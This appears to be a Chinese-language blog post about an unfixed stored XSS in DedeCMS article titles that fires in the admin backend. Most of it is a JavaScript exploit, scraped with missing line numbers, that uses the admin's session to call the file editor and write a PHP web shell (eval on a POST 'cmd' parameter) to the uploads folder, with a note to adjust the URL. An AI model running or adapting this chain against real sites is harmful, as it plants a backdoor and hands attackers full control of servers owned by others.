dedecms的漏洞很多,但是厂商都是不做修复。
之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。
![xss1](http://huakai.paxmac.org/wp-content/uploads/xss1.jpg)
后台可触发xss
利用js代码
02
|
if(window.XMLHttpRequest) {
|
03
|
request = new XMLHttpRequest();
|
04
|
if(request.overrideMimeType) {
|
05
|
request.overrideMimeType('text/xml');
|
07
|
} else if(window.ActiveXObject) {
|
08
|
var versions =
['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
|
09
|
for(var i=0; i<versions.length; i++) {
|
11
|
request = new ActiveXObject(versions[i]);
|
20
|
var postStr="fmdo=edit&backurl=&
activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads&
filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29
%3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改
|
23
|
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
|
24
|
xmlhttp.setRequestHeader("Content-length", postStr.length);
|
25
|
xmlhttp.setRequestHeader("Connection", "close");
|
26
|
xmlhttp.send(postStr);
|
触发前
触发后